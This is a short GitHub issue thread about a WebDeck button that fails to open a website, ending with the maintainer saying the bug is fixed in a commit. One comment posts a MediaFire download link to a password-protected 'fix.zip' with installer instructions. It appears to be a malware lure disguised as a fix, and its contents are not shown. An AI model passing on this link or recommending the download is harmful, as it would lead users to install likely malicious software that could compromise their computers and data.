### ISSUE TITLE
Open a Website Button didn't work.

### ISSUE THREAD

**Issue by Dtrieb** [Lenochxd/WebDeck#30]
**Describe the bug**
Open a Website Button didn't work.

**To Reproduce**
1. Go to 'Configure a Button - Open a Website'
2. Add everything incl. URL
3. Save
4. If I click on the new Button nothing happend.

**Expected behavior**
URL open in the Webbrowser

**Desktop (please complete the following information):**
 - OS: [WIN]
 - Browser [chrome]
 - Version [128.0.6613.85]

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lenochxd** [comment]
This issue has been resolved in commit fd627b5 and will be included in the upcoming release. Thank you for reporting this!
